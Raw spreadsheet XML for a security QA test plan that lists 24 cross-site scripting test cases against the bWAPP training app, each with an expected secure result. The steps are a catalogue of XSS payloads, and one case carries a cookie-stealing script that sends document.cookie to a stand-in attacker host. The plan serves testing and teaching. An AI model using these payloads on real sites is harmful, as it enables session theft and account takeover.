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EDE4FED-F93D-4056-B42B-E69F63E8BF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cross_site_script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vL4aeDXkQMxYtSHepL4utb6Urlu66kfagpB9NHsGic="/>
    </ext>
  </extLst>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="177" uniqueCount="108">
  <si>
    <t>Test Case ID</t>
  </si>
  <si>
    <t>Prerequisites</t>
  </si>
  <si>
    <t>Title/Description</t>
  </si>
  <si>
    <t>Steps</t>
  </si>
  <si>
    <t>Expected result:</t>
  </si>
  <si>
    <t>Actual Result</t>
  </si>
  <si>
    <t>Pass / Fail</t>
  </si>
  <si>
    <t>Comments</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_001</t>
  </si>
  <si>
    <t>1.bWAPP is installed and accessible (e.g., at http://localhost/bWAPP).
2.Security level is set to Low in the bWAPP settings.
3.A valid user account exists in the database (e.g., username: bee, password: bug)</t>
  </si>
  <si>
    <t>Basic XSS Payloads</t>
  </si>
  <si>
    <t>1. Enter &lt;script&gt;alert('XSS')&lt;/script&gt; in input fields.
2. Enter &lt;img src=x onerror=alert('XSS')&gt;.
3. Enter &lt;svg onload=alert('XSS')&gt;.
4. Submit and observe page behavior.</t>
  </si>
  <si>
    <t>No alert popup; input should be sanitized or encoded.</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>*****</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_002</t>
  </si>
  <si>
    <t>Reflected XSS (GET)</t>
  </si>
  <si>
    <t>1. Identify a URL parameter (e.g., ?search=test).
2. Replace value with &lt;script&gt;alert(1)&lt;/script&gt;.
3. Submit and check if script executes.</t>
  </si>
  <si>
    <t>Script should not execute; input should be reflected safely.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_003</t>
  </si>
  <si>
    <t>Reflected XSS (POST)</t>
  </si>
  <si>
    <t>1. Use Burp Suite/Postman to send POST request.
2. Insert &lt;script&gt;alert(1)&lt;/script&gt; into POST body parameters.
3. Submit and observe response.</t>
  </si>
  <si>
    <t>No script execution; input should be handled securely.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_004</t>
  </si>
  <si>
    <t>Reflected XSS (JSON)</t>
  </si>
  <si>
    <t>1. Send POST request with Content-Type: application/json.
2. Include {"name": "&lt;script&gt;alert(1)&lt;/script&gt;"}.
3. Check if JSON is parsed and reflected unsafely.</t>
  </si>
  <si>
    <t>JSON data should be properly encoded; no script execution.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_005</t>
  </si>
  <si>
    <t>Reflected XSS (AJAX/JSON)</t>
  </si>
  <si>
    <t>1. Trigger AJAX call (e.g., search autocomplete).
2. Intercept request and modify JSON response to include XSS payload.
3. Observe if payload executes in DOM.</t>
  </si>
  <si>
    <t>AJAX response should not inject executable scripts.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_006</t>
  </si>
  <si>
    <t>Reflected XSS (AJAX/XML)</t>
  </si>
  <si>
    <t>1. Send XML payload via AJAX: &lt;data&gt;&lt;value&gt;&lt;![CDATA[&lt;script&gt;alert(1)&lt;/script&gt;]]&gt;&lt;/value&gt;&lt;/data&gt;.
2. Check if parsed content triggers XSS.</t>
  </si>
  <si>
    <t>XML data should be safely handled; no script execution.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_007</t>
  </si>
  <si>
    <t>Reflected XSS (Back Button)</t>
  </si>
  <si>
    <t>1. Navigate to page with XSS payload in URL.
2. Go to another page, then press back button.
3. Check if payload executes from cache.</t>
  </si>
  <si>
    <t>Back navigation should not trigger stored malicious scripts.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_008</t>
  </si>
  <si>
    <t>Reflected XSS (Custom Header)</t>
  </si>
  <si>
    <t>1. Add custom header: X-User-Data: &lt;script&gt;alert(1)&lt;/script&gt;.
2. Send request to server.
3. Check if header is reflected in response.</t>
  </si>
  <si>
    <t>Headers should not be rendered as HTML/JS.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_009</t>
  </si>
  <si>
    <t>Reflected XSS (Eval)</t>
  </si>
  <si>
    <t>1. Find endpoint using eval() or similar.
2. Inject alert('XSS') via parameter.
3. Check if code is executed.</t>
  </si>
  <si>
    <t>eval() should not process unsanitized user input.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_010</t>
  </si>
  <si>
    <t>Reflected XSS (HREF)</t>
  </si>
  <si>
    <t>1. Enter javascript:alert('XSS') in link fields.
2. Check if link executes script when clicked.
3. Test data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;.</t>
  </si>
  <si>
    <t>HREF values should be validated; dangerous protocols blocked.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_011</t>
  </si>
  <si>
    <t>Reflected XSS (Login Form)</t>
  </si>
  <si>
    <t>1. Enter &lt;script&gt;alert(1)&lt;/script&gt; in username/password.
2. Submit and check error messages for reflection.</t>
  </si>
  <si>
    <t>Login errors should not reflect unsanitized input.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_012</t>
  </si>
  <si>
    <t>Reflected XSS (phpMyAdmin)</t>
  </si>
  <si>
    <t>1. In phpMyAdmin, enter XSS in SQL query or table name.
2. Check if output is HTML-encoded in UI.</t>
  </si>
  <si>
    <t>phpMyAdmin should encode all user-controlled output.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_013</t>
  </si>
  <si>
    <t>Reflected XSS (PHP_SELF)</t>
  </si>
  <si>
    <t>1. Locate form using &lt;?php echo $_SERVER['PHP_SELF']; ?&gt;.
2. Append /&lt;script&gt;alert(1)&lt;/script&gt; to URL.
3. Submit form.</t>
  </si>
  <si>
    <t>PHP_SELF should be sanitized before output.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_014</t>
  </si>
  <si>
    <t>Reflected XSS (Referer)</t>
  </si>
  <si>
    <t>1. Modify Referer header to http://site.com/&lt;script&gt;alert(1)&lt;/script&gt;.
2. Send request.
3. Check if Referer is logged/displayed unsafely.</t>
  </si>
  <si>
    <t>Referer header should not be trusted for rendering.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_015</t>
  </si>
  <si>
    <t>Reflected XSS (User-Agent)</t>
  </si>
  <si>
    <t>1. Change User-Agent to &lt;script&gt;alert(1)&lt;/script&gt;.
2. Browse site and check admin logs/profile pages.</t>
  </si>
  <si>
    <t>User-Agent should be treated as untrusted data.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_016</t>
  </si>
  <si>
    <t>Stored XSS (Blog)</t>
  </si>
  <si>
    <t>1. Post blog comment with &lt;script&gt;alert('XSS')&lt;/script&gt;.
2. View comment as another user.
3. Check if script executes.</t>
  </si>
  <si>
    <t>Comments should be stored safely and rendered securely.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_017</t>
  </si>
  <si>
    <t>Stored XSS (Change Secret)</t>
  </si>
  <si>
    <t>1. Change password/secret field to include XSS payload.
2. View profile/settings page later.
3. Check if payload triggers.</t>
  </si>
  <si>
    <t>Secret fields should not allow script injection.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_018</t>
  </si>
  <si>
    <t>Stored XSS (Cookies)</t>
  </si>
  <si>
    <t>1. Inject &lt;script&gt;fetch('https://attacker.com/?c='+document.cookie)&lt;/script&gt;.
2. Check if cookie is sent to external site when viewed.</t>
  </si>
  <si>
    <t>Cookies should not be stealable via stored XSS.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_019</t>
  </si>
  <si>
    <t>Stored XSS (SQLiteManager)</t>
  </si>
  <si>
    <t>1. Enter XSS payload into database fields via SQLiteManager.
2. View data in UI.
3. Check if script executes.</t>
  </si>
  <si>
    <t>Database UI should encode output properly.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_020</t>
  </si>
  <si>
    <t>Stored XSS (User-Agent)</t>
  </si>
  <si>
    <t>1. Set malicious User-Agent with XSS.
2. Browse site; let server store it.
3. Admin views logs—check if script runs.</t>
  </si>
  <si>
    <t>Stored User-Agent should be sanitized before display.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_021</t>
  </si>
  <si>
    <t>DOM-Based XSS</t>
  </si>
  <si>
    <t>1. Test document.location.hash, window.name.
2. Inject payload via fragment: #&lt;script&gt;alert(1)&lt;/script&gt;.
3. Check client-side script handling.</t>
  </si>
  <si>
    <t>Client-side scripts should not unsafely use DOM inputs.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_022</t>
  </si>
  <si>
    <t>Mutation-Based XSS</t>
  </si>
  <si>
    <t>1. Submit &lt;div&gt;&lt;svg&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;&lt;/div&gt;.
2. Observe browser parser behavior.
3. Check if script executes after mutation.</t>
  </si>
  <si>
    <t>Browser parsing should not transform safe input into executable scripts.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_023</t>
  </si>
  <si>
    <t>XSS in File Uploads</t>
  </si>
  <si>
    <t>1. Upload .svg with &lt;script&gt;alert(1)&lt;/script&gt;.
2. Upload .html file with JS.
3. Access uploaded file via URL.</t>
  </si>
  <si>
    <t>Uploaded files should be validated; scripts should not execute.</t>
  </si>
  <si>
    <t>TC_BWAPP_XCC_024</t>
  </si>
  <si>
    <t>XSS via Third-Party Libraries</t>
  </si>
  <si>
    <t>1. Identify outdated jQuery/AngularJS.
2. Use known XSS payloads for that version.
3. Test in affected components.</t>
  </si>
  <si>
    <t>Libraries should be patched; known vulnerabilities should not be exploitable.</t>
  </si>
  <si>
    <t>Test Scenario: Cross- Site Scripting (bWapp)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</si>
</sst>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sql_injectio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27">
  <tableColumns count="8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Actual Result"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0000-000007000000}" name="Pass / Fail"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0000-000008000000}" name="Comments"/>
  </tableColumns>
  <tableStyleInfo name="sql_injec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27"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="3" topLeftCell="A4" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E4" sqref="E4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.3984375" defaultRowHeight="15" customHeight="1" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="23.09765625" customWidth="1"/>
    <col min="2" max="2" width="33.8984375" customWidth="1"/>
    <col min="3" max="3" width="45.69921875" customWidth="1"/>
    <col min="4" max="4" width="50.69921875" customWidth="1"/>
    <col min="5" max="6" width="45.69921875" customWidth="1"/>
    <col min="7" max="7" width="13.69921875" customWidth="1"/>
    <col min="8" max="8" width="63.09765625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="15.75" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1" s="10" t="s">
        <v>107</v>
      </c>
      <c r="B1" s="11"/>
      <c r="C1" s="11"/>
      <c r="D1" s="11"/>
      <c r="E1" s="11"/>
      <c r="F1" s="11"/>
      <c r="G1" s="11"/>
      <c r="H1" s="12"/>
    </row>
    <row r="2" spans="1:8" ht="15.75" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="13"/>
      <c r="B2" s="14"/>
      <c r="C2" s="14"/>
      <c r="D2" s="14"/>
      <c r="E2" s="14"/>
      <c r="F2" s="14"/>
      <c r="G2" s="14"/>
      <c r="H2" s="15"/>
    </row>
    <row r="3" spans="1:8" ht="28.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>2</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>3</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>5</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>6</v>
      </c>
      <c r="H3" s="4" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="4" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4" s="5" t="s">
        <v>8</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C4" s="7" t="s">
        <v>10</v>
      </c>
      <c r="D4" s="7" t="s">
        <v>11</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>12</v>
      </c>
      <c r="F4" s="8"/>
      <c r="G4" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H4" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A5" s="5" t="s">
        <v>15</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C5" s="7" t="s">
        <v>16</v>
      </c>
      <c r="D5" s="7" t="s">
        <v>17</v>
      </c>
      <c r="E5" s="7" t="s">
        <v>18</v>
      </c>
      <c r="F5" s="8"/>
      <c r="G5" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H5" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A6" s="5" t="s">
        <v>19</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C6" s="7" t="s">
        <v>20</v>
      </c>
      <c r="D6" s="7" t="s">
        <v>21</v>
      </c>
      <c r="E6" s="7" t="s">
        <v>22</v>
      </c>
      <c r="F6" s="8"/>
      <c r="G6" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H6" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A7" s="5" t="s">
        <v>23</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C7" s="7" t="s">
        <v>24</v>
      </c>
      <c r="D7" s="7" t="s">
        <v>25</v>
      </c>
      <c r="E7" s="7" t="s">
        <v>26</v>
      </c>
      <c r="F7" s="8"/>
      <c r="G7" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H7" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" s="5" t="s">
        <v>27</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C8" s="7" t="s">
        <v>28</v>
      </c>
      <c r="D8" s="7" t="s">
        <v>29</v>
      </c>
      <c r="E8" s="7" t="s">
        <v>30</v>
      </c>
      <c r="F8" s="8"/>
      <c r="G8" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H8" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A9" s="5" t="s">
        <v>31</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C9" s="7" t="s">
        <v>32</v>
      </c>
      <c r="D9" s="7" t="s">
        <v>33</v>
      </c>
      <c r="E9" s="7" t="s">
        <v>34</v>
      </c>
      <c r="F9" s="8"/>
      <c r="G9" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H9" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A10" s="5" t="s">
        <v>35</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C10" s="7" t="s">
        <v>36</v>
      </c>
      <c r="D10" s="7" t="s">
        <v>37</v>
      </c>
      <c r="E10" s="7" t="s">
        <v>38</v>
      </c>
      <c r="F10" s="8"/>
      <c r="G10" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H10" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A11" s="5" t="s">
        <v>39</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C11" s="7" t="s">
        <v>40</v>
      </c>
      <c r="D11" s="7" t="s">
        <v>41</v>
      </c>
      <c r="E11" s="7" t="s">
        <v>42</v>
      </c>
      <c r="F11" s="8"/>
      <c r="G11" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H11" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" s="5" t="s">
        <v>43</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C12" s="7" t="s">
        <v>44</v>
      </c>
      <c r="D12" s="7" t="s">
        <v>45</v>
      </c>
      <c r="E12" s="7" t="s">
        <v>46</v>
      </c>
      <c r="F12" s="8"/>
      <c r="G12" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H12" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" s="5" t="s">
        <v>47</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C13" s="7" t="s">
        <v>48</v>
      </c>
      <c r="D13" s="7" t="s">
        <v>49</v>
      </c>
      <c r="E13" s="7" t="s">
        <v>50</v>
      </c>
      <c r="F13" s="8"/>
      <c r="G13" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H13" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" s="5" t="s">
        <v>51</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C14" s="7" t="s">
        <v>52</v>
      </c>
      <c r="D14" s="7" t="s">
        <v>53</v>
      </c>
      <c r="E14" s="7" t="s">
        <v>54</v>
      </c>
      <c r="F14" s="8"/>
      <c r="G14" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H14" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A15" s="5" t="s">
        <v>55</v>
      </c>
      <c r="B15" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C15" s="7" t="s">
        <v>56</v>
      </c>
      <c r="D15" s="7" t="s">
        <v>57</v>
      </c>
      <c r="E15" s="7" t="s">
        <v>58</v>
      </c>
      <c r="F15" s="8"/>
      <c r="G15" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H15" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A16" s="5" t="s">
        <v>59</v>
      </c>
      <c r="B16" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C16" s="7" t="s">
        <v>60</v>
      </c>
      <c r="D16" s="7" t="s">
        <v>61</v>
      </c>
      <c r="E16" s="7" t="s">
        <v>62</v>
      </c>
      <c r="F16" s="8"/>
      <c r="G16" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H16" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" s="5" t="s">
        <v>63</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C17" s="7" t="s">
        <v>64</v>
      </c>
      <c r="D17" s="7" t="s">
        <v>65</v>
      </c>
      <c r="E17" s="7" t="s">
        <v>66</v>
      </c>
      <c r="F17" s="8"/>
      <c r="G17" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H17" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A18" s="5" t="s">
        <v>67</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C18" s="7" t="s">
        <v>68</v>
      </c>
      <c r="D18" s="7" t="s">
        <v>69</v>
      </c>
      <c r="E18" s="7" t="s">
        <v>70</v>
      </c>
      <c r="F18" s="8"/>
      <c r="G18" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H18" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" s="5" t="s">
        <v>71</v>
      </c>
      <c r="B19" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C19" s="7" t="s">
        <v>72</v>
      </c>
      <c r="D19" s="7" t="s">
        <v>73</v>
      </c>
      <c r="E19" s="7" t="s">
        <v>74</v>
      </c>
      <c r="F19" s="8"/>
      <c r="G19" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H19" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" s="5" t="s">
        <v>75</v>
      </c>
      <c r="B20" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C20" s="7" t="s">
        <v>76</v>
      </c>
      <c r="D20" s="7" t="s">
        <v>77</v>
      </c>
      <c r="E20" s="7" t="s">
        <v>78</v>
      </c>
      <c r="F20" s="8"/>
      <c r="G20" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H20" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" s="5" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C21" s="7" t="s">
        <v>80</v>
      </c>
      <c r="D21" s="7" t="s">
        <v>81</v>
      </c>
      <c r="E21" s="7" t="s">
        <v>82</v>
      </c>
      <c r="F21" s="8"/>
      <c r="G21" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H21" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A22" s="5" t="s">
        <v>83</v>
      </c>
      <c r="B22" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C22" s="7" t="s">
        <v>84</v>
      </c>
      <c r="D22" s="7" t="s">
        <v>85</v>
      </c>
      <c r="E22" s="7" t="s">
        <v>86</v>
      </c>
      <c r="F22" s="8"/>
      <c r="G22" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H22" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" s="5" t="s">
        <v>87</v>
      </c>
      <c r="B23" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C23" s="7" t="s">
        <v>88</v>
      </c>
      <c r="D23" s="7" t="s">
        <v>89</v>
      </c>
      <c r="E23" s="7" t="s">
        <v>90</v>
      </c>
      <c r="F23" s="8"/>
      <c r="G23" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H23" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A24" s="5" t="s">
        <v>91</v>
      </c>
      <c r="B24" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C24" s="7" t="s">
        <v>92</v>
      </c>
      <c r="D24" s="7" t="s">
        <v>93</v>
      </c>
      <c r="E24" s="7" t="s">
        <v>94</v>
      </c>
      <c r="F24" s="8"/>
      <c r="G24" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H24" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A25" s="5" t="s">
        <v>95</v>
      </c>
      <c r="B25" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C25" s="7" t="s">
        <v>96</v>
      </c>
      <c r="D25" s="7" t="s">
        <v>97</v>
      </c>
      <c r="E25" s="7" t="s">
        <v>98</v>
      </c>
      <c r="F25" s="8"/>
      <c r="G25" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H25" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A26" s="5" t="s">
        <v>99</v>
      </c>
      <c r="B26" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C26" s="7" t="s">
        <v>100</v>
      </c>
      <c r="D26" s="7" t="s">
        <v>101</v>
      </c>
      <c r="E26" s="7" t="s">
        <v>102</v>
      </c>
      <c r="F26" s="8"/>
      <c r="G26" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H26" s="8" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="94.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A27" s="5" t="s">
        <v>103</v>
      </c>
      <c r="B27" s="6" t="s">
        <v>9</v>
      </c>
      <c r="C27" s="7" t="s">
        <v>104</v>
      </c>
      <c r="D27" s="7" t="s">
        <v>105</v>
      </c>
      <c r="E27" s="7" t="s">
        <v>106</v>
      </c>
      <c r="F27" s="8"/>
      <c r="G27" s="9" t="s">
        <v>13</v>
      </c>
      <c r="H27" s="8" t="s">
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:H2"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="G4:G2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tc_cross_site_scripting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created xsi:type="dcterms:W3CDTF">2025-06-15T22:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-16T04:53:32Z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D3E0ABD8FBC3471898A1C518CF620E09_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-5.7.3.8095</vt:lpwstr>
  </property>
</Properties>
</file>